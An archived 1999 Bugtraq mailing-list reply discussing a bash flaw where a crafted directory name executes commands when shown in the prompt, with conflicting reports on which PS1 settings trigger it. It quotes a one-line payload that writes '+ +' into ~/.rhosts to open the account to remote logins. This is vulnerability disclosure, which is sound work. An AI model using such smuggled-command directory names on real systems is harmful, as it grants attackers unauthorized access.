Date sent: Thu, 22 Apr 1999 01:39:48 +0100 Send reply to: Andy Church <achurchat_private> From: Andy Church <achurchat_private> Subject: Re: Bash Bug Originally to: shadowat_private To: BUGTRAQat_private Hello together > >Figured while everyone was working with bash, I might as well make this > >one public(I apologize if this is old news, apparently it hasnt been fixed > >if so). > > > >If a user creates a directory with a command like > > > >mkdir "\ `echo -e \ "echo + +> ~\57.rhosts\ " > x; source x; rm -f \x\ ` " Not bad ! > > > >and someone cd's into said directory, either by accident, or whatever, > >then it will cause it to actually execute. > > Just to clarify, this only happens if PS1 (the bash prompt) contains > \w or \W _and_ a prompt is displayed containing the bogus directory name. > This means unattended shell scripts are safe. As a workaround, use `pwd` > in place of \w. Sorry, with bash version 2.01.1 (supplied with SuSE5.3) is just the opposite of what you are clarifying. If one has \w or \W specified in PS1 to show the path, it does NOT happen and if `pwd` is specified instead of \w or \W it DOES happen. > > Tested with bash 1.14 (it's the only one I have handy). > > --Andy Church > achurchat_private > http://achurch.dragonfire.net/ Kind regards Phibus ----------------------------------------------------------- Philip Rueegsegger System Manager Bruker AG Direct dial : +41-1-825 93 46 Industriestrasse 26 Telephone : +41-1-825 91 11 CH-8117 Faellanden Telefax : +41-1-825 94 69 Switzerland E-Mail : philip.rueegseggerat_private -----------------------------------------------------------
This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 14:43:38 PDT